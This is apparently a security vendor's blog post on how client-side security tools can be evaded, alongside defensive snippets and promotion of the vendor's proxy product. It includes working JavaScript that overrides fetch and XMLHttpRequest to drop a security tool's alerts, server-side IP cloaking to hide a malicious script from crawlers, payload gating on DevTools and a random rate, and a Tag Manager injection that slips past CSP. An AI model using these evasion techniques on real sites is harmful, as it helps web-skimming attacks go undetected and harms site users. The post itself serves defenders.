In This Blog:
- Why you should test your compliance tools
- How to bypass JavaScript agents
- How to bypass CSP
- How to bypass crawlers
- Defense tips + safer alternatives
- Disclaimers & disclosure

Important — purpose & scope. This article is published for educational and defensive purposes only. The examples are intended to explain general browser behavior and design limitations that can affect client-side security tooling; they are not a step-by-step attack manual, and they are not targeted at any specific vendor, product, or organization. We do not condone illicit use of any techniques discussed here. If you discover a vulnerability related to content in this post, please follow responsible disclosure — see the "Responsible disclosure" section at the end of this post. All testing was conducted in accordance with the applicable vendor terms of service and applicable laws.
“In a world where compliance tools can fail on basic circumvention techniques, no one is any safer and false senses of security enlarge the issues at hand.”
— Simon Wijckmans, CEO, cside
We went back and forth on whether to write this article. On one hand, we do not want to single out vendors. On the other, when security solutions are sold but can be easily bypassed, we're all at risk. We started cside to build a safer internet, one that our family members and friends could use without worrying too much about security. Sometimes that means calling out weaknesses in security perimeters, especially when they stem from well-known platform constraints.
While we respect that, for a lot of businesses, compliance requires a tool that simply checks a box, compliance is also an opportunity to improve the security of a platform, especially when those compliance requirements were created for the purpose of preventing attacks from executing.
Imagine a state-of-the-art smoke detector that flawlessly detects a fire but has its alarm wire cut before it can sound the warning. The detection is perfect, but the response never happens. This is the dangerous reality for some client-side security solutions operating within a web browser.
When a browser loads a page, scripts execute in the same JavaScript environment and can interact with shared global objects. Under certain conditions this can allow one script to observe or modify another. Even sophisticated client-side detections can be limited if their outbound reporting is disrupted. This is a practical risk that defenders should consider when relying on purely client-side telemetry. A malicious script can interfere with a security tool's outbound reporting, which in some cases may significantly reduce visibility into an ongoing incident.
For that reason, cside decided not to rely fully on client-side detections, opting instead for a more advanced and nuanced approach.
How to bypass a JavaScript Agent
The primary way a browser communicates with a server is through network requests, typically using the fetch API or XMLHttpRequest (XHR). To a developer, these might seem like fundamental, unchangeable parts of the browser. In reality, they are simply properties on the global window object that any script can redefine.
Many legitimate scripts interact with the fetch API; this is a common and well-understood approach.
However, a script can also leverage these APIs to interfere with the outbound calls of client-side security vendors. This is easily done by:
- Redefining window.fetch to inspect or block outgoing security reports.
- Modifying XMLHttpRequest.prototype.send to intercept and discard alerts.
- Wrapping these functions to alter request payloads, strip security headers, or log sensitive data.
Let's see just how simple this is. Imagine your site loads two scripts:
- A third-party chat plugin that has been compromised.
- A security tool.
Now, here is the kind of code the compromised plugin.js might contain. Like many scripts do for legitimate purposes, it interacts with the fetch and XMLHttpRequest browser APIs.
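A hedged sketch of what such interception could look like (the reporting endpoint `security-vendor.example` and all names here are illustrative placeholders, not any real vendor's code):

```javascript
// Sketch of a compromised plugin silently swallowing a security tool's
// outbound reports. All endpoint names are illustrative placeholders.
const originalFetch = globalThis.fetch;

globalThis.fetch = function (resource, options) {
  const url = typeof resource === "string" ? resource : resource.url;
  if (url.includes("security-vendor.example/report")) {
    // Pretend the report succeeded; the alert never leaves the browser.
    return Promise.resolve(new Response(null, { status: 204 }));
  }
  // All other traffic passes through untouched, so nothing looks broken.
  return originalFetch.call(this, resource, options);
};

// The same pattern applies to XHR: record the URL at open() time, then
// drop matching requests inside send().
if (typeof XMLHttpRequest !== "undefined") {
  const originalOpen = XMLHttpRequest.prototype.open;
  const originalSend = XMLHttpRequest.prototype.send;
  XMLHttpRequest.prototype.open = function (method, url, ...rest) {
    this.__url = String(url);
    return originalOpen.call(this, method, url, ...rest);
  };
  XMLHttpRequest.prototype.send = function (...args) {
    if (this.__url && this.__url.includes("security-vendor.example/report")) {
      return; // alert dropped silently
    }
    return originalSend.apply(this, args);
  };
}
```

Because every other request still works normally, nothing on the page looks broken to the user or the developer.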
With code like this running, your security tool is effectively impeded. It might still detect malicious behavior, but its calls for help (fetch or XHR requests) are intercepted and dropped into a void. You'll never know an attack took place.

How this can be prevented
Preventing this issue for fetch requests is dead easy: store a local reference to the function before any other script has a chance to tamper with the global. You don't even need to rename anything.

```javascript
// Store `fetch` locally to reuse later:
const { fetch } = window;

// Use the local reference later in the code:
fetch(...)
```

XHR is a bit more work, but still possible with a couple of lines of code:

```javascript
// Store references locally to reuse later:
const { apply } = Reflect;
const { XMLHttpRequest } = window;
const { open, send } = XMLHttpRequest.prototype;

// In an async part of the code:
const request = new XMLHttpRequest();
apply(open, request, ["POST", "/endpoint"]);
apply(send, request, []);
```

Our analysis of common detection methodologies suggests these solutions could be susceptible to the bypass concepts documented above.
We highly recommend that any security provider look into these approaches to help protect their customers.
How to bypass a Crawler
A crawler originates from an IP address, like any request. However, crawlers typically run on cloud provider IP addresses. The server that serves a client-side script sees the requester's IP address, along with many other attributes in the request headers, and decides what to respond with based on them.
This is logical and exists for good reason. A marketing tool may serve different versions of its script based on the browser making the request, or based on the user's location to simplify privacy framework compliance. Client-side scripts are dynamic for good reason.
However, this is an opportunity for a bad actor. To illustrate:
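A minimal sketch of such cloaking logic (the IP prefixes and script bodies are illustrative placeholders, not real cloud ranges or payloads):

```javascript
// Hypothetical server-side cloaking sketch. Prefixes and script bodies
// are illustrative placeholders.
const CLOUD_PREFIXES = ["34.", "35.", "52."]; // sample datacenter ranges

function pickScript(clientIp) {
  const fromCloud = CLOUD_PREFIXES.some((prefix) => clientIp.startsWith(prefix));
  // Crawlers coming from datacenter IPs get the clean file; everyone
  // else gets the malicious payload.
  return fromCloud ? "/* clean script */" : "/* malicious payload */";
}
```

Any request handler, e.g. an Express route calling `pickScript(req.ip)` before responding, is enough to serve this.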
The above example can run on any type of web server, including simple PaaS platforms that don't require any level of verification.
What the script does is rather simple: when a request comes from a cloud provider IP, it serves a clean script; any other request gets the malicious one.
Of course, a bad actor could add more logic: for example, only serving the bad script when developer tools are closed, and only 5% of the time, making it harder to detect by manual review.
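A sketch of that gating logic, written as a pure function so the thresholds are visible (the 160px DevTools heuristic and the 5% rate are illustrative choices, not known attacker code):

```javascript
// Hypothetical gating sketch. The window-size heuristic for detecting
// open DevTools and the 5% serve rate are illustrative choices.
function shouldServePayload(widthDelta, heightDelta, rand) {
  // Docked DevTools shrink the inner viewport relative to the outer window.
  const devtoolsLikelyOpen = widthDelta > 160 || heightDelta > 160;
  return !devtoolsLikelyOpen && rand < 0.05;
}

// In a browser, the deltas would come from the real window object:
if (typeof window !== "undefined") {
  const serve = shouldServePayload(
    window.outerWidth - window.innerWidth,
    window.outerHeight - window.innerHeight,
    Math.random()
  );
  // ...inject the second-stage script only when `serve` is true
}
```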
This can substantially reduce the visibility a crawler-based solution has for targeted attacks.
Using a residential proxy to appear like a normal residential user is unlikely to make a significant difference. A bad actor can still detect the use of a residential proxy.
Another easy method is making a client-side subrequest based on browser-available parameters. This allows the full range of browser APIs to be used to decide whether or not to make the subrequest.
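A sketch of that decision, using signals that headless crawlers commonly expose (the specific checks are illustrative heuristics, not a complete fingerprint):

```javascript
// Hypothetical sketch: decide in the browser whether to request the
// second-stage script. The checks are illustrative heuristics only.
function looksLikeRealBrowser(nav) {
  // Automation frameworks typically set navigator.webdriver to true,
  // and headless environments often report no installed plugins.
  const automated = nav.webdriver === true;
  const hasPlugins = nav.plugins ? nav.plugins.length > 0 : false;
  return !automated && hasPlugins;
}

if (typeof navigator !== "undefined" && looksLikeRealBrowser(navigator)) {
  // ...only here issue the subrequest that pulls in the real payload
}
```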
Many crawler-based solutions simply check the source URL against a list of known bad domain names procured from threat feed providers. The problem with this approach is that a targeted attack will not be flagged, and it can take a long time for an attack to get noticed. Bad actors can also easily avoid malicious-domain detection by hosting their scripts on commonly used domains like googletagmanager.com.
A crawler-based solution approaches a dynamic security threat with a static security mindset. While convenient, this does not work by design.
Based on publicly documented fundamental browser capabilities and standard JavaScript functionality, crawler-based approaches may face the limitations described above. We encourage vendors to clearly document any such limitations so customers can make informed deployment decisions.
How to bypass CSP
Another commonly used security approach is the Content Security Policy (CSP).
CSP can help limit exposure by reducing the set of allowed sources. But many websites use tools that let anyone in the world upload scripts to them. If a policy is not tight enough, this leads to an easy bypass. And even when a policy is tight, an attacker may choose to perform the attack in a way that CSP does not monitor.
How this would work: once a bad actor finds their way into a web application, they can inject a subrequest to a Google Tag Manager container. Example:

```html
<script async src="https://www.googletagmanager[.]com/gtm.js?id=GTM-XXXXXX"></script>
```

Inside this container, they can include any scripts they wish, including inline scripts, which are even harder to secure.
Since CSP has no real context of script payload, the visibility is rather limited.
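For instance, a policy that allow-lists the Tag Manager domain, a common real-world configuration, permits the container and, transitively, whatever the container chooses to load (the policy below is an illustrative example, not a recommendation):

```http
Content-Security-Policy: script-src 'self' https://www.googletagmanager.com
```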
Some solutions attempt to change this by fetching the script after the fact. But the same problem as with the crawler appears: anything that looks non-human is likely to receive a different response than a human user would.
While you could specify the Tag Manager container in the CSP, this is not very common. Other domains, like githubusercontent.com, face the same issue.
And ultimately, if a source is compromised, whether by an incident at the vendor or by the domain name expiring, CSP will be unable to help.
Unlike the client-side script method, we haven't been able to find a reliable technique within CSP that avoids these bypass methods.
CSP has limitations; it is being used for more than it was initially designed for.
Companies that adopt CSP often struggle to maintain it and deal with regular outages of client-side tools when policies block changes.
Safer alternatives (the cside approach)
The cside team has substantial experience in client-side security. Throughout that experience, we have seen bad actors operate at a level of sophistication that gives them the upper hand over some security approaches. If the reward is high, any gap in a security detection model is an opportunity for a bad actor.
Given the browser specification's limitations for client-side security, we've had to get creative, which is why we approach client-side security with the ability to intercept scripts through a hybrid proxy.
- Proxy-side detection: By performing security checks on the server, we ensure that suspicious activity is always captured, regardless of client-side tampering.
- Client-side detections: Customer-trusted scripts from reputable vendors are monitored client-side, removing the proxy from the request flow. However, as soon as suspicions arise, the proxy can intercept the requests for deeper analysis.
- Client-side safeguards: We add an extra layer on the client to prevent request tampering; this is supplementary to our main server-side protections.
The mix of the above brings us closest to full coverage. cside actively contributes to the W3C in the hope of drawing attention to client-side security, aiming to adjust the browser specification to allow for fully bulletproof client-side security.
At cside, we capture attacks. If you are reading this blog post, you are likely a sufficiently high-value target for a bad actor to invest some mental capacity in inspecting how your web security works. It is better to be safe and assume a bad actor will attempt to bypass the security solutions you use. So use solutions that think a step ahead.
Disclaimer & Legal Safe Harbor
This post is for informational and educational purposes only. It does not constitute legal advice, and the views and technical analysis expressed are our own. Nothing here should be taken as an admission of liability by any party.
None of the above-mentioned approaches or code samples are advanced or solely used for malicious purposes. These are basic JavaScript use-cases, and in no way proprietary. The snippets shared are actively used in client-side scripts for legitimate purposes. We are not responsible for any use of these basic JavaScript functions by a malicious party.
All example code and pseudo-code are illustrative only. They are intentionally generic, non-proprietary, and not designed to run in real environments. Their purpose is to highlight defensive considerations, not to provide attackers with working exploits.
Please note: attempting to apply these techniques on systems you do not own, or without explicit permission, may violate laws such as the U.S. Computer Fraud and Abuse Act, the UK Computer Misuse Act, or similar rules in other jurisdictions.
We actively support good-faith security research. If you follow the Responsible Disclosure process outlined below, we will treat your research as authorized and will not take legal action against you. In short, this content is provided to help defenders strengthen protections — not to enable malicious behavior.
Responsible Disclosure
If you believe you have discovered a vulnerability related to content in this post (including third-party scripts or integrations we reference), please do not publish exploit details publicly. Instead, email us at
[email protected] with the subject line “Vulnerability report — [short title]”.
Include reproducible steps, affected URLs, and a secure contact method. We will acknowledge receipt within 5 business days and coordinate remediation. We will not pursue legal action against good-faith reporters who follow these guidelines.